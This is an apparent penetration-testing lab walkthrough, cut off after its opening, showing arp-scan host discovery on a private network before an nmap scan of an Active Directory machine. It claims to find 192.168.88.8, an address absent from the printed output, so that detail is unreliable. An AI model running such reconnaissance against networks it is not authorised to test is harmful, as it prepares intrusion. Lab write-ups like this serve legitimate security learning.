CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »